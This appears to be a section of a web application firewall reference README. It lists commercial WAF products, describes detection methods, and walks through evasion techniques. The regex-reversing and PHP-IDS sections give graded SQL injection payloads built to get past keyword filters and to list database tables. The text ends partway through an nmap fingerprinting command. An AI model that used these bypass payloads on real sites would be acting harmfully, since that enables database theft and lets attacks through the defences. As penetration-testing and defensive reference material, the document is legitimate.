|
360 WangZhanBao
|
A WAF solution from 360 Security Team.
|
|
Airlock
|
The Airlock Web Application Firewall offers a unique combination of protective mechanisms for web applications. Each access is systematically monitored and filtered at every level. It features reverse proxy, central checkpoint, filtering, API security and dynamic whitelisting.
|
|
Anquanbao
|
A cloud based WAF solution for enterprises featuring big data analysis, clustering solutions, content optimisations, and access accelerations.
|
|
Armor
|
A virtual WAF solution by Armor technologies which protects web-applications from OWASP top 10 attacks and features accurate response and remediation via applied intelligence from their threat centre.
|
|
Application Security Manager
|
A comprehensive web application firewall from F5 Networks that protects apps and data from known and unknown threats, defends against bots that bypass standard protections, and virtually patches app vulnerabilities.
|
|
Amazon AWS WAF
|
A WAF solution from Amazon AWS that features full time web-traffic filtering, virtual patching, traffic visibility, attack transparency integrated with customisable rules.
|
|
Baidu Cloud WAF
|
A cloud based protection system from Baidu to effectively defend against web application attacks. It features cloud based real-time protections, load balancing, DDoS protection and its own content-delivery network.
|
|
Barracuda
|
A WAF solution from Barracuda Networks featuring web aplication, API, and mobile apps against various attacks. Beside it provides DDoS protections, automated attack and bot protections, access controls and authentication protections.
|
|
BinarySEC
|
A solution from BinarySec which provides all round security protections from many kinds of threats. BinarySec WAF allows active whitelisting while peotecting your site from major known threats and malware.
|
|
BlockDoS
|
A WAF solution which features high performance in-built content delivery systems, custom SSL, DNS protection, dynamic caching and stable DDoS protection.
|
|
ChinaCache
|
A featured firewall for China which features its own content-delivery network, virtual patching and constant threat discovery transparency report.
|
|
Kona Site Defender
|
A cloud based WAF solution from Akamai technologies that feaures a proprietary WAF rule set, created and automatically updated based on visibility into the latest attacks with protections. It provides API security integrated with DevOps security, report visibility, etc.
|
## Testing Methodology
Alright, now lets see the approach of testing WAFs. Wait, before that we need to know how they work right? Here you go.
### How WAFs Work:
- Using a set of rules to distinguish between normal requests and malicious requests.
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.
### Operation Modes:
- __Negative Model (Blacklist based)__ -
One that defines what is not allowed. Eg. Block all `` inputs.
- __Positive Model (Whitelist based)__ -
One that defines what is allowed and rejects everything else.
- __Mixed/Hybrid Model (Inclusive model)__ -
One that uses a mixed concept of blacklisting and whitelisting stuff.
### Where To Look:
- Always look out for common ports that expose that a WAF `80`, `443`, `8000`, `8008`, `8080`, `8088`.
> __Tip:__ You can use automate this easily by commandline using a screenshot taker like [WebScreenShot](https://github.com/maaaaz/webscreenshot).
- Some WAFs set their own cookies in requests (eg. Citrix Netscaler, Yunsuo WAF).
- Some associate themselves with separate headers (eg. Anquanbao WAF, Amazon AWS WAF).
- Some often alter headers and jumble characters to confuse attacker (eg. Citrix Netscaler, Big IP WAF).
- Some (often rare) expose themselves in the `Server` header
- Some WAFs expose themselves in the response content (eg. DotDefender, Armor, truShield Sitelock).
- Other WAFs reply with unusual response codes upon malicious requests (eg. WebKnight).
### Detection Techniques:
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
3. If there is a login page somewhere, try some common (easily detectable) payloads like `' or 1 = 1 --`.
4. If there is some search box or input field somewhere, try detecting payloads like ``.
5. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
6. Many a times, the WAF varies the `Server` header upon different types of interactions.
7. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
8. Side Channel Attacks - Examine the timing behaviour of the request and response content.
## WAF Detection
Wanna detect WAFs? Lets see how.
> __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#awesome-tools).
## Evasion Techniques
Lets look at some methods of bypassing and evading WAFs.
### Fuzzing/Bruteforcing:
__Method:__
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
- Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
- Can be done with automated tools like BurpSuite Intruder.
__Technique:__
- Load up your wordlist into Burp Intruder/custom fuzzer and start the bruteforce.
- Record/log all responses from the different payloads fuzzed.
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
- If blocking noticed, increase fuzz latency (eg. 2-4 secs)
- Always use proxies, since chances are real that your IP gets blocked.
- __Drawback:__
- This method often fails.
- Many a times your IP will be blocked (temporarily/permanently).
### Regex-Reversing:
__Method:__
- Most efficient method of bypassing WAFs.
- Some WAFs rely upon matching the attack payloads with the signatures in their databases.
- Payload matches the reg-ex the WAF triggers alarm.
__Techniques:__
##### Step 1:
__Keyword filer__: `and`, `or`, `union`
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
- __Filtered Injection__: `union select user, password from users`
- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
##### Step 2:
__Keyword filer__: `and`, `or`, `union`, `where`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where)/i', $id)`
- __Filtered Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`
##### Step 3:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit)/i', $id)`
- __Filtered Injection__: `1 || (select user from users limit 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
##### Step 4:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by)/i', $id)`
- __Filtered Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`
##### Step 5:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select)/i', $id)`
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`
- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`
##### Step 6:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)`
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || user_id is not null`
- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`
- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`
##### Step 7:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
Possible __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)`
- __Filtered Injection__: `1 || substr(user,1,1) = unhex(61)`
- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
##### Step 8:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)`
- __Filtered Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
- __Bypassed Injection__: `1 || lpad(user,7,1)`
##### Step 9:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)`
- __Filtered Injection__: `1 || lpad(user,7,1)`
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
---
__PHP-IDS__ generally blocks input containing `=` or `(` or `'` following with any a string or integer e.g. `1 or 1=1`, `1 or '1'`, `1 or char(97)`. However, it can be bypassed using a statement that does not contain `=`, `(` or `'` symbols.
#### Scenario 1:
- __Filtered Injection__: `1 or 1 = 1`
- __Bypassed Injection__: `1 or 1`
#### Scenario 2:
- __Filtered injection__: `1 union select 1, table_name from information_schema.tables where table_name = 'users'`
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'`
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)`
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a`
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273`
__Drawbacks:__
- This method is time consuming.
## Google Dorks Approach:
## Awesome Tools
### WAF Fingerprinting:
__1. Fingerprinting with [NMap](https://nmap.org)__:
__Source:__ [GitHub](https://github.com/nmap/nmap) | [SVN](http://svn.nmap.org)
- Normal WAF Fingerprinting
```
nmap --script=http-waf-fingerprint